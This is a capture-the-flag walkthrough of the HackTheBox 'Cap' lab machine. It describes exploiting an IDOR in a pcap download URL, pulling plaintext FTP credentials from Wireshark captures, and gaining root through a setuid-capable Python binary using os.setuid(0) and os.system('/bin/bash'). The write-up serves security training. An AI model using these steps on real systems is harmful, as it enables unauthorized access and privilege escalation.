We covered Insecure Direct Object Reference vulnerability exploitation along with Python privilege escalation as part of HackTheBox Cap CREST CRT Track.

Cap is an easy difficulty Linux machine running an HTTP server thus allowing users to capture the non-enrypted traffic. Improper controls result in Insecure Direct Object Reference (IDOR) giving access to another user capture. The capture contains plaintext credentials and can be used to gain foothold. A Linux capability is then leveraged to get root.

Initial Enumeration

I started with an Nmap scan using nmap -A <IP_ADDRESS> on the target IP address. This revealed several open ports:

  • Port 21 (FTP): I found that anonymous access was allowed, but there was nothing useful there.
  • Port 22 (SSH): I didn’t have any credentials for this initially.
  • Port 80 (HTTP): This became my primary focus.

I also identified the web server as Gunicorn.

Web Application Enumeration & Exploitation

Navigating to the web server on port 80, I discovered a network monitoring dashboard. The dashboard displayed a username “Nathan” and featured a “Security Snapshot” that allowed downloading .pcap (packet capture) files. The URL structure for these downloads was /data/<number>, for instance, /data/2. I manually tested different numbers in the URL: /data/1 downloaded a different .pcap file, /data/0 downloaded another with a different packet count, but /data/3 redirected back to the dashboard. This behavior indicated an Insecure Direct Object Reference (IDOR) vulnerability, as the application wasn’t properly authorizing access to these files. I skipped directory busting with tools like Gobuster because it wouldn’t have been effective in this specific case.

Packet Capture Analysis

I opened the downloaded .pcap files with Wireshark. I made sure to check the “Protocol Hierarchy” under “Statistics” in Wireshark to guide my investigation. I noticed that FTP packets made up a significant portion of the traffic (34%). Since FTP is a plain-text protocol, I knew credentials could often be found in the captures. Filtering for FTP traffic, I successfully uncovered the username “Nathan” and his password.

Privilege Escalation

With the discovered credentials (Nathan and his password), I logged in via SSH. Once I had a shell, I ran LinPEAS, a privilege escalation enumeration tool. LinPEAS identified that Python had the setuid capability. This meant I could use Python to change the user ID, potentially to root.

I used the following Python commands to escalate privileges:

  • python (to start the Python interpreter as Nathan)
  • import os
  • os.setuid(0) (to change the user ID to 0, which is root)
  • os.system("/bin/bash") (to execute a bash shell as root)

This successfully granted me a root shell.

Technical Commands

Here are the technical commands I used:

  • nmap -A <IP_ADDRESS>
  • python
  • import os
  • os.setuid(0)
  • os.system("/bin/bash")

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles